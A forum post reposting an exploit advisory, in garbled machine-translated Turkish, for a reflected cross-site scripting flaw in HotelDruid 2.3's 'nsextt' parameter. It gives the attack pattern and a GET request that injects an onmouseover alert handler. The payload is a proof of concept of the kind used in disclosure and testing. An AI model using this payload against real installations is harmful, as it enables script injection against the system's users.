Hoteldruid 2.3 - Multiple XSS Vuln.
by storix - May 30, 2019 at 10:39 PM
#1
===========================================================================================
# Başlık Exploit: Hoteldruid 2.3 - 'nsextt' XSS Injection
# CVE: 
# Tarih: 18-02-2019
# Exploit Author: Kybre
# Satıcı Web Sitesi: https://sourceforge.net/projects/hoteldruid/
# Yazılım Bağlantı: https://sourceforge.net/projects/hoteldruid/
# Sürüm: v2.3
# Kategori: webapps
Wamp64, @Win: # üzerinde test
# Yazılım descr * iption: HotelDruid otel ve hostel odaları hale getirmek için tasarlanmış bir emlak yönetim sistemi (PMS) 'dir
Oda ve kahvaltı daire, ya da bir web tarayıcısından yönetmek kolay günlük kiralama başka türlü.
===========================================================================================
# POC - XSS
# Parametreler: nsextt
# Saldırı Kalıbı: x% 22 + onmouseover% 3dalert (0x000981) + x% 3d% 22
# GET İsteği: http: //localhost/hoteldruid/visualizza_tabelle.php nsextt = x "onmouseover = alert (0x000981) x =" 
===========================================================================================
###########################################################################################
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
Stimarine Xss vuln Adient 0 86 August 26, 2019 at 09:01 PM
Last Post: Adient
ultimate loan manager - xss Adient 0 90 August 25, 2019 at 09:39 PM
Last Post: Adient
vBulletin XSS via Adient 0 96 August 25, 2019 at 09:33 PM
Last Post: Adient

 Users browsing this thread: 1 Guest(s)